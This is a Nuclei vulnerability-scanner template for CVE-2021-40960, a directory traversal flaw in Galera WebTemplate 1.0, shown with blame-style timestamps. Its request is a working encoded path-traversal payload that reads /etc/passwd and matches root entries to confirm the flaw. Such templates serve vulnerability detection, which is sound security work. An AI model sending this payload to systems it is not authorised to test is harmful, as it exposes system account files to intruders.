my-nuclei-templates/CVE-2021-40960.yaml

36 lines
1009 B
YAML
Raw Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2021-40960
info:
2022-06-18 08:05:25 +00:00
name: Galera WebTemplate 1.0 Directory Traversal
2021-11-09 22:49:13 +00:00
author: daffainfo
severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
reference:
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
2022-06-18 08:05:25 +00:00
- http://www.galera.com.tr/
2021-11-09 22:49:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-06-18 08:05:25 +00:00
cvss-score: 9.8
2021-11-09 22:49:13 +00:00
cve-id: CVE-2021-40960
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2021,lfi
2021-11-09 22:49:13 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/03/06